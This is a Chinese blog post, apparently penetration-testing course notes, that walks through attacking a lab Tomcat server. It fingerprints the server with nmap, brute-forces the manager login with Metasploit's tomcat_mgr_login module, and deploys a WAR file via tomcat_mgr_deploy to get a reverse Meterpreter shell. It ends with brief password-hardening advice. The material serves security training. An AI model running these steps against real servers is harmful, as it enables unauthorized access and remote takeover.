码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 6-26漏洞利用-tomcat管理密码破解


    在这里插入图片描述

    tomcat介绍

    Tomcat服务器是一个免费的开放源代码的WEB应用服务器,这里的服务器指的是中间键,类似于iis、apache,这些中间键的web容器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调式JSP程序的首选。iis是开发asp的首选,apache是开发php的首选。默认情况下,8180端口是tomcat管理的HTTP的端口

    在这里插入图片描述

    点击tomcat manager

    在这里插入图片描述

    会让我们输入对应的账号密码,输出或者点取消,会返回401,表示我们未认证

    探测目标tomcat

    使用nmap -sV -p 8180 IP地址 探测目标tomcat版本信息

    nmap -sV -p 8180 192.168.1.105
    
    • 1

    在这里插入图片描述

    现在我们已经知道版本,而且管理界面需要输入对应的用户名密码登录

    msf破解tomcat密码

    msf下的auxiliary/scanner/http/tomcat_mgr_login模块来对tomcat管理登录密码进行破解

    在这里插入图片描述

    msfconsole
    use auxiliary/scanner/http/tomcat_mgr_login
    show options
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    set rhosts 192.168.42.137
    set rport 8180
    run
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    当我们得知密码的时候,我们可以进行登录验证

    在这里插入图片描述

    发现可以上传war文件

    msf利用tomcat管理

    在msf下可以使用use multi/http/tomcat_mgr_deploy模块利用tomcat upload功能反弹shell。

    它的原理是上传一个war文件,在war文件执行对应的脚本,执行payload的内容,这个时候,就会执行反弹

    在这里插入图片描述

    use exploit/multi/http/tomcat_mgr_deploy
    show options
    
    • 1
    • 2

    在这里插入图片描述

    set rhosts 192.168.42.137
    set rport 8180
    run
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    我们管理tomcat上传deploy的war文件,并反弹回meterpreter,这就是反弹shell的原理

    修改tomcat密码,为一个复杂的密码,使得不太容易被破解,以及设置对应的阈值

  • 相关阅读:
    【Vue3】动态 class 类
    【C语言练习——打印空心上三角及其变形】
    在安装pytorch过程中遇到mxnet安装问题
    nodejs毕业设计基于Nodejs实现的心理健康咨询微信小程序
    go-cqhttp权限管理
    SpringBoot项目基础设施搭建
    企业微信 API 接口调用教程:图文详解企业微信 API 的使用方法
    Remix v2 中使用 remix-i18n 进行国际化翻译
    JAVA:实现N Queens 皇后问题算法(附完整源码)
    常见面试题之计算机网络
  • 原文地址:https://blog.csdn.net/m0_53008479/article/details/126124110
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号